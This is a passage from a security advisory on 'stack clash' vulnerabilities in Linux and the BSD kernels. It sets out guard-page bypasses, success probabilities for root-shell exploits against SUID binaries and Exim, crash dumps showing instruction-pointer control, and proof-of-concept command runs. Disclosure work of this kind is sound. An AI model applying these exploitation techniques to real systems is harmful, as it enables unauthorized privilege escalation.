. TASK_SIZE is the highest address of the user-space (0x7ffffffff000)

. MIN_GAP = 128MB + stack_maxrandom_size()

. stack_maxrandom_size() is ~16GB (or ~4GB if the kernel is vulnerable
to CVE-2015-1593, but we do not consider this case here)

. arch_mmap_rnd() is a random variable in the [0B,1TB] range

- the end of the stack region is equal to (as calculated by
randomize_stack_top() in fs/binfmt_elf.c):

stack_end = TASK_SIZE - "stack_rand"

where:

. "stack_rand" is a random variable in the [0, stack_maxrandom_size()]
range

- the initial mmap-stack distance is therefore equal to:

stack_end - mmap_end = MIN_GAP + arch_mmap_rnd() - "stack_rand"

= 128MB + stack_maxrandom_size() - "stack_rand" + arch_mmap_rnd()

= 128MB + StackRand + MmapRand

where:

. StackRand = stack_maxrandom_size() - "stack_rand", a random variable
in the [0B,16GB] range

. MmapRand = arch_mmap_rnd(), a random variable in the [0B,1TB] range

Consequently, the minimum initial mmap-stack distance is only 128MB
(CVE-2017-1000379), and:

- On kernels vulnerable to offset2lib, the heap of a PIE (which is
mapped at the end of the mmap region) is mapped below and close to the
stack with a good probability (~1/700). We can therefore clash the
stack with the heap in Step 1, jump over the stack guard-page and into
the heap in Step 3, and smash the stack with the heap and gain control
of rip in Step 4a (after 6 hours on average). However, because the
addresses of all executable regions contain null-bytes, and because
most of our stack-smashes in Step 4a are string operations (except the
getaddrinfo() method), we were unable to transform such a rip control
into arbitrary code execution.

- On all kernels, either a PIE or ld.so is mapped directly below the
stack with a good probability (~1/17000) -- the end of the PIE's or
ld.so's read-write segment is then equal to the start of the stack
guard-page. We can therefore adapt our ld.so "hwcap" exploit to amd64
and obtain root privileges through most SUID binaries on most Linux
distributions (after 5 hours on average).

Kernels vulnerable to offset2lib, local Exim proof-of-concept

Exim's binary is usually a PIE, mapped at the end of the mmap region;
and the heap, which always grows up and is randomized above the end of
the binary, is therefore randomized above the end of the mmap region
(arch_randomize_brk() in arch/x86/kernel/process.c):

heap_start = mmap_end + "heap_rand"

where "heap_rand" is a random variable in the [0B,32MB] range
(negligible and ignored here). For example, on Debian 8.5:

# cat /proc/"`pidof -s /usr/sbin/exim4`"/maps
...
7fa6410d6000-7fa6411c8000 r-xp 00000000 08:01 14574 /usr/sbin/exim4
7fa6413b4000-7fa6413bd000 rw-p 00000000 00:00 0
7fa6413c5000-7fa6413c7000 rw-p 00000000 00:00 0
7fa6413c7000-7fa6413c9000 r--p 000f1000 08:01 14574 /usr/sbin/exim4
7fa6413c9000-7fa6413d2000 rw-p 000f3000 08:01 14574 /usr/sbin/exim4
7fa6413d2000-7fa6413d7000 rw-p 00000000 00:00 0
7fa641b34000-7fa641b76000 rw-p 00000000 00:00 0 [heap]
7ffdf3e53000-7ffdf3ed6000 rw-p 00000000 00:00 0 [stack]
7ffdf3f3c000-7ffdf3f3e000 r-xp 00000000 00:00 0 [vdso]
7ffdf3f3e000-7ffdf3f40000 r--p 00000000 00:00 0 [vvar]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]

To reach the start of the stack with the end of the heap (through the -p
memory leak in Exim) in Step 1 of our stack-clash, we must minimize the
initial heap-stack distance, and hence the initial mmap-stack distance,
and set RLIMIT_STACK to MIN_GAP (~16GB). This limits the size of our -p
argument strings on the stack to 16GB/4=4GB, and because we then leak
the same amount of heap memory through -p, the initial heap-stack
distance must be:

- longer than 4GB (the stack must be able to contain the -p argument
strings);

- shorter than 8GB (the end of the heap must be able to reach the start
of the stack during the -p memory leak).

The initial heap-stack distance (approximately the initial mmap-stack
distance, 128MB + StackRand + MmapRand, but we ignore the 128MB term
here) follows a trapezoidal Irwin-Hall distribution, and the [4GB,8GB]
range is within the first non-uniform area of this trapezoid, so the
probability that the initial heap-stack distance is in this range is:

SUM(d = 4GB; d < 8GB; d++) d / (16GB * 1TB)

= SUM(d = 0; d < 4GB; d++) (4GB + d) / (16GB * 1TB)

= SUM(d = 0; d < 2^32; d++) (2^32 + d) / (2^34 * 2^40)

~= ((2^32)*(2^32) + (2^32)*(2^32) / 2) / (2^74)

~= 3 / 2^11

~= 1 / 682

The probability of gaining rip control after the heap reaches the stack
is ~1/16 (as calculated by a 64-bit version of the small helper program
presented in IV.1.1.), and the final probability of gaining rip control
with our local Exim proof-of-concept is:

(3 / 2^11) * (1/16) ~= 1 / 10922

On our 8GB Debian 8.7 test machine, this proof-of-concept takes roughly
2 seconds per run, and has a good chance of gaining rip control after
10922 * 2 seconds ~= 6 hours:

# gdb /usr/sbin/exim4 core.6049
GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1
...
This GDB was configured as "x86_64-linux-gnu".
...
Core was generated by `/usr/sbin/exim4 -p0000000000000000000000000000000000000000000000000000000000000'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 __memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:41
41 ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory.
(gdb) x/i $rip
=> 0x7ffab1be7061 <__memcpy_sse2_unaligned+65>: retq
(gdb) x/xg $rsp
0x7ffb9b294a48: 0x4141414141414141

Kernels vulnerable to offset2lib, ld.so ".dynamic" exploit

Since kernels vulnerable to offset2lib map PIEs below and close to the
stack, we tried to adapt our ld.so ".dynamic" exploit to amd64. MIN_GAP
guarantees a minimum distance of 128MB between the theoretical end of
the mmap region and the end of the stack, but the stack then grows down
to store the argument and environment strings, and may therefore occupy
the theoretical end of the mmap region (where nothing has been mapped
yet). Consequently, the end of the mmap region (where the PIE will be
mapped) slides down to the first available address, directly below the
stack guard-page and the initial stack expansion (described in II.3.2.):

7ffbb7e51000-7ffbb7e53000 r-xp 00000000 fd:03 4465810 /tmp/test64
...
7ffbb8053000-7ffbb808c000 rw-p 00002000 fd:03 4465810 /tmp/test64
7ffbb808d000-7ffc180ae000 rw-p 00000000 00:00 0 [heap]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]

Note: in this example, the "[stack]" is, again, incorrectly displayed as
the "[heap]" by show_map_vma() (in fs/proc/task_mmu.c).

This layout is ideal for our stack-clash exploits, but poses an
unexpected problem: because the PIE is mapped directly below the stack,
the stack cannot grow anymore, and the only free stack space is the
initial stack expansion (128KB) minus the argv[] and envp[] pointers
(which are stored there, as mentioned in II.3.2.):

- on the one hand, many argv[] and envp[] pointers, and hence many
argument and environment strings, result in a higher probability of
mapping the PIE directly below the stack;

- on the other hand, many argv[] and envp[] pointers consume most of the
initial stack expansion and do not leave enough free stack space for
ld.so to operate.

In practice, we pass 96KB of argv[] pointers to execve(), thus leaving
32KB of free stack space for ld.so, and since the size of a pointer is
8B, and the maximum size of an argument string is 128KB, we also pass
96KB/8B*128KB=1.5GB of argument strings to execve(). The resulting
probability of mapping the PIE directly below the stack is:

SUM(s = 0; s < 1.5GB - 128MB; s++) s / (16GB * 1TB)

~= ((1.5GB - 128MB)^2 / 2) / (16GB * 1TB)

~= 1 / 17331

On a 4GB Virtual Machine, each run takes 1 second, and 17331 runs take
roughly 5 hours. But we cannot add more uncertainty to this exploit, and
because of the problems discussed in IV.1.4. (null-bytes in DT_NEEDED,
but also in DT_AUXILIARY on 64-bit, etc), we were unable to overwrite
the .dynamic section with a pattern that does not significantly decrease
this exploit's probability of success.

All kernels, ld.so "hwcap" exploit

Despite this failure, we had an intuition: when the PIE is mapped
directly below the stack, the stack layout should be deterministic --
rsp should point into the 128KB of initial stack expansion, at a 32KB
offset above the start of the stack, and the only entropy should be the
8KB of sub-page randomization within the stack (arch_align_stack() in
arch/x86/kernel/process.c). The following output of our small test
program confirmed this intuition (the fourth field is the distance
between the start of the stack and our main()'s rsp when the PIE is
mapped directly below the stack):

$ grep -w sp test64.out | sort -nk4
sp 0x7ffbc271ff38 -> 28472
sp 0x7ffbb95ccff8 -> 28664
sp 0x7ffbaf062678 -> 30328
sp 0x7ffbb08736e8 -> 30440
sp 0x7ffbbc616d18 -> 32024
sp 0x7ffbc1a0fdb8 -> 32184
sp 0x7ffbb9c28ff8 -> 32760
sp 0x7ffbdbf4c178 -> 33144
sp 0x7ffbb39bc1c8 -> 33224
sp 0x7ffbebb86838 -> 34872

Surprisingly, the output of this test program contained additional
valuable information:

7ffbb7e51000-7ffbb7e53000 r-xp 00000000 fd:03 4465810 /tmp/test64
7ffbb8034000-7ffbb8037000 rw-p 00000000 00:00 0
7ffbb804d000-7ffbb804e000 rw-p 00000000 00:00 0
7ffbb804e000-7ffbb8050000 r--p 00000000 00:00 0 [vvar]
7ffbb8050000-7ffbb8052000 r-xp 00000000 00:00 0 [vdso]
7ffbb8052000-7ffbb8053000 r--p 00001000 fd:03 4465810 /tmp/test64
7ffbb8053000-7ffbb808c000 rw-p 00002000 fd:03 4465810 /tmp/test64
7ffbb808d000-7ffc180ae000 rw-p 00000000 00:00 0 [heap]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]

- the distance between the end of the read-execute segment of our test
program and the start of its read-only and read-write segments is
approximately 2MB; indeed, for every ELF on amd64:

$ readelf -a /usr/bin/su | grep -wA1 LOAD
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x00000000000061b4 0x00000000000061b4 R E 200000
LOAD 0x0000000000006888 0x0000000000206888 0x0000000000206888
0x0000000000000798 0x00000000000007d0 RW 200000

$ readelf -a /lib64/ld-linux-x86-64.so.2 | grep -wA1 LOAD
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x000000000001fad0 0x000000000001fad0 R E 200000
LOAD 0x000000000001fb60 0x000000000021fb60 0x000000000021fb60
0x000000000000141c 0x00000000000015e8 RW 200000

- several objects are actually mapped inside this ~2MB hole: [vdso],
[vvar], and two anonymous mappings (7ffbb804d000-7ffbb804e000 and
7ffbb8034000-7ffbb8037000).

This discovery allowed us to adapt our ld.so "hwcap" exploit to amd64:

- we choose hardware-capabilities that are small enough to be mapped
inside this ~2MB hole, but large enough to defeat the 8KB sub-page
randomization of the stack;

- we jump over the stack guard-page, and over the read-only and
read-write segments of the PIE, and exploit ld.so as we did on i386.

This exploit's probability of success is therefore 1 when the PIE is
mapped directly below the stack, and its final probability of success is
~1/17331: it takes 1 second per run, and has a good chance of obtaining
a root-shell after 5 hours. Moreover, it works on all kernels: if a SUID
binary is not a PIE, or if the kernel is not vulnerable to offset2lib,
we simply jump over ld.so's read-write segment, instead of the PIE's.
For example, on Fedora 25, when the exploit succeeds and loads our own
library /var/tmp/a (the 7ffbabbef000-7ffbabca7000 mapping contains the
hardware-capabilities that we smash):

55a0c9e8d000-55a0c9e91000 r-xp 00000000 fd:00 112767 /usr/libexec/cockpit-polkit
55a0ca091000-55a0ca093000 rw-p 00004000 fd:00 112767 /usr/libexec/cockpit-polkit
7ffbab603000-7ffbab604000 r-xp 00000000 fd:00 4866583 /var/tmp/a
7ffbab604000-7ffbab803000 ---p 00001000 fd:00 4866583 /var/tmp/a
7ffbab803000-7ffbab804000 r--p 00000000 fd:00 4866583 /var/tmp/a
7ffbab804000-7ffbaba86000 rw-p 00000000 00:00 0
7ffbaba86000-7ffbabaab000 r-xp 00000000 fd:00 4229637 /usr/lib64/ld-2.24.so
7ffbabbef000-7ffbabca7000 rw-p 00000000 00:00 0
7ffbabca7000-7ffbabca9000 r--p 00000000 00:00 0 [vvar]
7ffbabca9000-7ffbabcab000 r-xp 00000000 00:00 0 [vdso]
7ffbabcab000-7ffbabcad000 rw-p 00025000 fd:00 4229637 /usr/lib64/ld-2.24.so
7ffbabcad000-7ffbabcae000 rw-p 00000000 00:00 0
7ffbabcaf000-7ffc0bcf0000 rw-p 00000000 00:00 0 [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]

========================================================================
IV.2. OpenBSD
========================================================================

========================================================================
IV.2.1. Maximum RLIMIT_STACK vulnerability (CVE-2017-1000372)
========================================================================

The OpenBSD kernel limits the maximum size of the user-space stack
(RLIMIT_STACK) to MAXSSIZ (32MB); the execve() system-call allocates a
MAXSSIZ memory region for the stack and divides it in two:

- the second part, effectively the user-space stack, is mapped
PROT_READ|PROT_WRITE at the end of this stack memory region, and
occupies RLIMIT_STACK bytes (by default 8MB for root processes, and
4MB for user processes);

- the first part, effectively a large stack guard-page, is mapped
PROT_NONE at the start of this stack memory region, and occupies
MAXSSIZ - RLIMIT_STACK bytes.

Unfortunately, we discovered that if an attacker sets RLIMIT_STACK to
MAXSSIZ, he eliminates the PROT_NONE part of the stack region, and hence
the stack guard-page itself (CVE-2017-1000372). For example:

# sh -c 'ulimit -S -s; procmap -a -P'
8192
Start End Size Offset rwxpc RWX I/W/A Dev Inode - File
...
14cf6000-14cfafff 20k 00000000 r-xp+ (rwx) 1/0/0 00:03 52375 - /usr/sbin/procmap [0xdb29ce10]
...
84a7b000-84a7bfff 4k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ]
cd7db000-cefdafff 24576k 00000000 ---p+ (rwx) 1/0/0 00:00 0 - [ stack ]
cefdb000-cf7cffff 8148k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ]
cf7d0000-cf7dafff 44k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ]
total 10348k

# sh -c 'ulimit -S -s `ulimit -H -s`; procmap -a -P'
Start End Size Offset rwxpc RWX I/W/A Dev Inode - File
...
1a47f000-1a483fff 20k 00000000 r-xp+ (rwx) 1/0/0 00:03 52375 - /usr/sbin/procmap [0xdb29ce10]
...
8a3c8000-8a3c9fff 8k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ]
cd7c9000-cf7bffff 32732k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ]
cf7c0000-cf7c8fff 36k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ]
total 33992k

A remote attacker cannot exploit this vulnerability, because he cannot
modify RLIMIT_STACK; but a local attacker can set RLIMIT_STACK to
MAXSSIZ, and:

- Step 1: malloc()ate almost 2GB of heap memory, until the heap reaches
the start of the stack region;

- Steps 2 and 3: consume MAXSSIZ (32MB) of stack memory, until the
stack-pointer reaches the start of the stack region (Step 2) and moves
into the heap (Step 3);

- Step 4: smash the stack with the heap (Step 4a) or smash the heap with
the stack (Step 4b).

========================================================================
IV.2.2. Recursive qsort() vulnerability (CVE-2017-1000373)
========================================================================

To complete Step 2, a recursive function is needed, and the first
possibly recursive function that we investigated is qsort(). On the one
hand, glibc's _quicksort() function (in stdlib/qsort.c) is non-recursive
(iterative): it uses a small, specialized stack of partition structures
(two pointers, low and high), and guarantees that no more than 32
partitions (on i386) or 64 partitions (on amd64) are pushed onto this
stack, because it always pushes the larger of two sub-partitions and
iterates on the smaller partition.

On the other hand, BSD's qsort() function is recursive: it always
recurses on the first sub-partition, and iterates on the second
sub-partition; but instead, it should always recurse on the smaller
sub-partition, and iterate on the larger sub-partition (CVE-2017-1000373
in OpenBSD, CVE-2017-1000378 in NetBSD, and CVE-2017-1082 in FreeBSD).

In theory, because BSD's qsort() is not randomized, an attacker can
construct a pathological input array of N elements that causes qsort()
to deterministically recurse N times. In practice, because this qsort()
uses the median-of-three medians-of-three selection of a pivot element
(the "ninther"), our attack constructs an input array of N elements that
causes qsort() to recurse N/4 times.

========================================================================
IV.2.3. /usr/bin/at proof-of-concept
========================================================================

/usr/bin/at is SGID-crontab (which can be escalated to full root
privileges) because it must be able to create ("at -t"), list ("at -l"),
and remove ("at -r") job-files in the /var/cron/atjobs directory:

-r-xr-sr-x 4 root crontab 31376 Jul 26 2016 /usr/bin/at
drwxrwx--T 2 root crontab 512 Jul 26 2016 /var/cron/atjobs

To demonstrate that OpenBSD's RLIMIT_STACK and qsort() vulnerabilities
can be transformed into powerful primitives such as heap corruption, we
developed a proof-of-concept against "at -l" (the list_jobs() function):

- Step 1 (Clash): first, list_jobs() malloc()ates an atjob structure for
each file in /var/cron/atjobs -- if we create 40M job-files, then the
heap reaches the stack, but we do not exhaust the address-space;

- Steps 2 and 3 (Run and Jump): second, list_jobs() qsort()s the
malloc()ated jobs -- if we construct their time-stamps with our
qsort() attack, then we can cause qsort() to recurse 40M/4=10M times
and consume at least 10M*4B=40MB of stack memory (each recursive call
to qsort() consumes at least 4B, the return-address) and move the
stack-pointer into the heap;

- Step 4b (Smash the heap with the stack): last, list_jobs() free()s the
malloc()ated jobs, and abort()s with an error message -- OpenBSD's
hardened malloc() implementation detects that the heap has been
corrupted by the last recursive calls to qsort().

This naive version of our /usr/bin/at proof-of-concept poses two major
problems:

- Our pathological input array of N=40M elements cannot be sorted (Step
2 never finishes because it exhibits qsort()'s worst-case behavior,
N^2). To solve this problem, we divide the input array in two:

. the first, pathological part contains only n=(33MB/176B)*4=768K
elements that are needed to complete Steps 2 and 3, and cause
qsort() to recurse n/4 times and consume (n/4)*176B=33MB of stack
memory (MAXSSIZ+1MB) as each recursive call to qsort() consumes 176B
of stack memory;

. the second, innocuous part contains the remaining N-n=39M elements
that are needed to complete Step 1, but not Steps 2 and 3, and are
therefore swapped into the second, iterative partition of the first
recursive call to qsort().

- We were unable to create 40M files in /var/cron/atjobs: after one
week, OpenBSD's default filesystem (ffs) had created only 4M files,
and the rate of file creation had dropped from 25 files/second to 4
files/second. We did not solve this problem, but nevertheless wanted
to validate our proof-of-concept:

. we transformed it into an LD_PRELOAD library that intercepts calls
to readdir() and fstatat(), and pretends that our 40M files in
/var/cron/atjobs exist;

. we made /var/cron/atjobs world-readable and LD_PRELOADed our library
into a non-SGID copy of /usr/bin/at;

. after about an hour, "at" reports random heap corruptions:

# chmod o+r /var/cron/atjobs
# chmod o+r /var/cron/at.deny

$ ulimit -c 0
$ ulimit -S -d `ulimit -H -d`
$ ulimit -S -s `ulimit -H -s`
$ ulimit -S -a
...
coredump(blocks) 0
data(kbytes) 3145728
stack(kbytes) 32768
...
$ cp /usr/bin/at .

$ LD_PRELOAD=./OpenBSD_at.so ./at -l -v -q x > /dev/null
initializing jobkeys
finalizing jobkeys
reading jobs
10%
20%
30%
40%
50%
60%
70%
80%
90%
100%
sorting jobs
at(78717) in free(): error: chunk info corrupted
Abort trap

$ LD_PRELOAD=./OpenBSD_at.so ./at -l -v -q x > /dev/null
initializing jobkeys
finalizing jobkeys
reading jobs
10%
20%
30%
40%
50%
60%
70%
80%
90%
100%
sorting jobs
at(14184) in free(): error: modified chunk-pointer 0xcd6d0120
Abort trap

========================================================================
IV.3. NetBSD
========================================================================

Like OpenBSD, NetBSD is vulnerable to the maximum RLIMIT_STACK
vulnerability (CVE-2017-1000374): if a local attacker sets RLIMIT_STACK
to MAXSSIZ, he eliminates the PROT_NONE part of the stack region -- the
stack guard-page itself. Unlike OpenBSD, however, NetBSD:

- defines MAXSSIZ to 64MB on i386 (128MB on amd64);

- maps the run-time link-editor ld.so directly below the stack region,
even if ASLR is enabled (CVE-2017-1000375):

$ sh -c 'ulimit -S -s; pmap -a -P'
2048
Start End Size Offset rwxpc RWX I/W/A Dev Inode - File
08048000-0804dfff 24k 00000000 r-xp+ (rwx) 1/0/0 00:00 21706 - /usr/bin/pmap [0xc5c8f0b8]
...
bbbee000-bbbfefff 68k 00000000 r-xp+ (rwx) 1/0/0 00:00 107525 - /libexec/ld.elf_so [0xc535f580]
bbbff000-bbbfffff 4k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ]
bbc00000-bf9fffff 63488k 00000000 ---p+ (rwx) 1/0/0 00:00 0 - [ stack ]
bfa00000-bfbeffff 1984k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ]
bfbf0000-bfbfffff 64k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ]
total 9528k

$ sh -c 'ulimit -S -s `ulimit -H -s`; pmap -a -P'
Start End Size Offset rwxpc RWX I/W/A Dev Inode - File
08048000-0804dfff 24k 00000000 r-xp+ (rwx) 1/0/0 00:00 21706 - /usr/bin/pmap [0xc5c8f0b8]
...
bbbee000-bbbfefff 68k 00000000 r-xp+ (rwx) 1/0/0 00:00 107525 - /libexec/ld.elf_so [0xc535f580]
bbbff000-bbbfffff 4k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ]
bbc00000-bfbeffff 65472k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ]
bfbf0000-bfbfffff 64k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ]
total 73016k

# cp /usr/bin/pmap .
# paxctl +A ./pmap
# sh -c 'ulimit -S -s `ulimit -H -s`; ./pmap -a -P'
Start End Size Offset rwxpc RWX I/W/A Dev Inode - File
08048000-0804dfff 24k 00000000 r-xp+ (rwx) 1/0/0 00:00 172149 - /tmp/pmap [0xc5cb3c64]
...
bbbee000-bbbfefff 68k 00000000 r-xp+ (rwx) 1/0/0 00:00 107525 - /libexec/ld.elf_so [0xc535f580]
bbbff000-bbbfffff 4k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ]
bbc00000-bf1bffff 55040k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ]
bf1c0000-bf1cefff 60k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ]
total 62580k

Consequently, a local attacker can set RLIMIT_STACK to MAXSSIZ,
eliminate the stack guard-page, and:

- skip Step 1, because ld.so's read-write segment is naturally mapped
directly below the stack region;

- Steps 2 and 3: consume 64MB (MAXSSIZ) of stack memory (for example,
through the recursive qsort() vulnerability, CVE-2017-1000378) until
the stack-pointer reaches the start of the stack region (Step 2) and
moves into ld.so's read-write segment (Step 3);

- Step 4b: smash ld.so's read-write segment with the stack.

We did not try to exploit this vulnerability, nor did we search for a
vulnerable SUID or SGID binary, but we wrote a simple proof-of-concept,
and some of the following crashes may be exploitable:

$ sh -c 'ulimit -S -s `ulimit -H -s`; ./NetBSD_CVE-2017-1000375 0x04000000'
[1] Segmentation fault ./NetBSD_CVE-201...

$ sh -c 'ulimit -S -s `ulimit -H -s`; ./NetBSD_CVE-2017-1000375 0x03000000'

...

$ sh -c 'ulimit -S -s `ulimit -H -s`; ./NetBSD_CVE-2017-1000375 0x03ec5000'

$ sh -c 'ulimit -S -s `ulimit -H -s`; ./NetBSD_CVE-2017-1000375 0x03ec5400'
[1] Segmentation fault ./NetBSD_CVE-201...

$ sh -c 'ulimit -S -s `ulimit -H -s`; gdb ./NetBSD_CVE-2017-1000375'
GNU gdb (GDB) 7.7.1
...
(gdb) run 0x03ec5400
Program received signal SIGSEGV, Segmentation fault.
0xbbbf448d in _rtld_symlook_default () from /usr/libexec/ld.elf_so
(gdb) x/i $eip
=> 0xbbbf448d <_rtld_symlook_default+185>: mov %edx,(%esi,%edi,4)
(gdb) info registers
esi 0xbabae890 -1162155888
edi 0x0 0
...
(gdb) run 0x03ec5800
Program received signal SIGSEGV, Segmentation fault.
0xbbbf4465 in _rtld_symlook_default () from /usr/libexec/ld.elf_so
(gdb) x/i $eip
=> 0xbbbf4465 <_rtld_symlook_default+145>: mov 0x4(%ecx),%edx
(gdb) info registers
ecx 0x41414141 1094795585
...
(gdb) run 0x03ec5c00
Program received signal SIGSEGV, Segmentation fault.
0xbbbf4408 in _rtld_symlook_default () from /usr/libexec/ld.elf_so
(gdb) x/i $eip
=> 0xbbbf4408 <_rtld_symlook_default+52>: mov (%eax),%esi
(gdb) info registers
eax 0x41414141 1094795585
...

========================================================================
IV.4. FreeBSD
========================================================================

========================================================================
IV.4.1. setrlimit() RLIMIT_STACK vulnerability (CVE-2017-1085)
========================================================================

FreeBSD's kern_proc_setrlimit() function contains the following comment
and code:

/*
* Stack is allocated to the max at exec time with only
* "rlim_cur" bytes accessible. If stack limit is going
* up make more accessible, if going down make inaccessible.
*/
if (limp->rlim_cur != oldssiz.rlim_cur) {
...
if (limp->rlim_cur > oldssiz.rlim_cur) {
prot = p->p_sysent->sv_stackprot;
size = limp->rlim_cur - oldssiz.rlim_cur;
addr = p->p_sysent->sv_usrstack -
limp->rlim_cur;
} else {
prot = VM_PROT_NONE;
size = oldssiz.rlim_cur - limp->rlim_cur;
addr = p->p_sysent->sv_usrstack -
oldssiz.rlim_cur;
}
...
(void)vm_map_protect(&p->p_vmspace->vm_map,
addr, addr + size, prot, FALSE);
}

OpenBSD's and NetBSD's dosetrlimit() function contains the same comment,
which accurately describes the layout of their user-space stack region.
Unfortunately, FreeBSD's kern_proc_setrlimit() comment and code are
incorrect, as hinted at in exec_new_vmspace():

/*
* Destroy old address space, and allocate a new stack
* The new stack is only SGROWSIZ large because it is grown
* automatically in trap.c.
*/

and vm_map_stack_locked():

/*
* We initially map a stack of only init_ssize. We will grow as
* needed later.

where init_ssize is SGROWSIZ (128KB), not MAXSSIZ (64MB on i386),
because "init_ssize = (max_ssize < growsize) ? max_ssize : growsize;"
(and max_ssize is MAXSSIZ, and growsize is SGROWSIZ).

As a result, if a program calls setrlimit() to increase RLIMIT_STACK,
vm_map_protect() may turn a read-only memory region below the stack into
a read-write region (CVE-2017-1085), as demonstrated by the following
proof-of-concept:

% ./FreeBSD_CVE-2017-1085
Segmentation fault

% ./FreeBSD_CVE-2017-1085 setrlimit to the max
char at 0xbd155000: 41

========================================================================
IV.4.2. Stack guard-page disabled by default (CVE-2017-1083)
========================================================================

The FreeBSD kernel implements a 4KB stack guard-page, and recent
versions of the FreeBSD Installer offer it as a system hardening option.
Unfortunately, it is disabled by default (CVE-2017-1083):

% sysctl security.bsd.stack_guard_page
security.bsd.stack_guard_page: 0

========================================================================
IV.4.3. Stack guard-page vulnerabilities (CVE-2017-1084)
========================================================================

- If FreeBSD's stack guard-page is enabled, its entire logic is
implemented in vm_map_growstack(): this function guarantees a minimum
distance of 4KB (the stack guard-page) between the start of the stack
and the end of the memory region that is mapped below (but the stack
guard-page is not physically mapped into the address-space).

Unfortunately, this guarantee is given only when the stack grows down
and clashes with the memory region mapped below, but not if the memory
region mapped below grows up and clashes with the stack: this
vulnerability effectively eliminates the stack guard-page
(CVE-2017-1084). In our proof-of-concept:

. we allocate anonymous mmap()s of 4KB, until the end of an anonymous
mmap() reaches the start of the stack [Step 1];

. we call a recursive function until the stack-pointer reaches the
start of the stack and moves into the anonymous mmap() directly
below [Step 2];

. but we do not jump over the stack guard-page, because each call to
the recursive function allocates (and fully writes to) a 1KB
stack-based buffer [Step 3];

. and we do not crash into the stack guard-page, because CVE-2017-1084
has effectively eliminated the stack guard-page in Step 1.

# sysctl security.bsd.stack_guard_page=1
security.bsd.stack_guard_page: 0 -> 1

% ./FreeBSD_CVE-2017-FGPU
char at 0xbfbde000: 41

- vm_map_growstack() implements most of the stack guard-page logic in
the following code:

/*
* Growing downward.
*/
/* Get the preliminary new entry start value */
addr = stack_entry->start - grow_amount;

/*
* If this puts us into the previous entry, cut back our
* growth to the available space. Also, see the note above.
*/
if (addr < end) {
stack_entry->avail_ssize = max_grow;
addr = end;
if (stack_guard_page)
addr += PAGE_SIZE;
}

where:

. addr is the new start of the stack;

. stack_entry->start is the old start of the stack;

. grow_amount is the size of the stack expansion;

. end is the end of the memory region below the stack.

Unfortunately, the "addr < end" test should be "addr <= end": if addr,
the new start of the stack, is equal to end, the end of the memory
region mapped below, then the stack guard-page is eliminated
(CVE-2017-1084). In our proof-of-concept:

. we allocate anonymous mmap()s of 4KB, until the end of an anonymous
mmap() reaches a randomly chosen distance below the start of the
stack [Step 1];

. we call a recursive function until the stack-pointer reaches the
start of the stack, and the stack expansion reaches the end of the
anonymous mmap() below [Step 2];

. we do not jump over the stack guard-page, because each call to the
recursive function allocates (and fully writes to) a 1KB stack-based
buffer [Step 3];

. and we crash into the stack guard-page most of the time;

. but we survive with a probability of 4KB/128KB=1/32 (grow_amount is
always a multiple of SGROWSIZ, 128KB) because CVE-2017-1084 has
effectively eliminated the stack guard-page in Step 2.

% sysctl security.bsd.stack_guard_page
security.bsd.stack_guard_page: 1

% sh -c 'while true; do ./FreeBSD_CVE-2017-FGPE; done'
Segmentation fault
char at 0xbe45e000: 41; final dist 6097 (24778705)
Segmentation fault
Segmentation fault
Segmentation fault
...
Segmentation fault
Segmentation fault
Segmentation fault
char at 0xbd25e000: 41; final dist 7036 (43654012)
Segmentation fault
Segmentation fault
Segmentation fault
...
Segmentation fault
Segmentation fault
Segmentation fault
char at 0xbd29e000: 41; final dist 5331 (43390163)
Segmentation fault
Segmentation fault
Segmentation fault
...

In contrast, if FreeBSD's stack guard-page is disabled, our
proof-of-concept always survives:

# sysctl security.bsd.stack_guard_page=0
security.bsd.stack_guard_page: 1 -> 0

% sh -c 'while true; do ./FreeBSD_CVE-2017-FGPE; done'
char at 0xbe969000: 41; final dist 89894 (19488550)
char at 0xbfa6d000: 41; final dist 74525 (1647389)
char at 0xbf4df000: 41; final dist 78 (7471182)
char at 0xbe9e4000: 41; final dist 112397 (18986765)
char at 0xbf693000: 41; final dist 49811 (5685907)
char at 0xbf533000: 41; final dist 51037 (7128925)
char at 0xbd799000: 41; final dist 26043 (38167995)
char at 0xbd54b000: 11; final dist 83754 (40585002)
char at 0xbe176000: 41; final dist 36992 (27824256)
char at 0xbfa91000: 41; final dist 57449 (1499241)
char at 0xbd1b9000: 41; final dist 26115 (44328451)
char at 0xbd1c8000: 41; final dist 94852 (44266116)
char at 0xbf73a000: 41; final dist 22276 (5003012)
char at 0xbe6b1000: 41; final dist 58854 (22341094)
char at 0xbeb81000: 41; final dist 124727 (17295159)
char at 0xbfb35000: 41; final dist 43174 (829606)
...

- FreeBSD's thread library (libthr) mmap()s a secondary PROT_NONE stack
guard-page at a distance RLIMIT_STACK below the end of the stack:

# sysctl security.bsd.stack_guard_page=1
security.bsd.stack_guard_page: 0 -> 1

% sh -c 'exec procstat -v $$'
PID START END PRT RES PRES REF SHD FLAG TP PATH
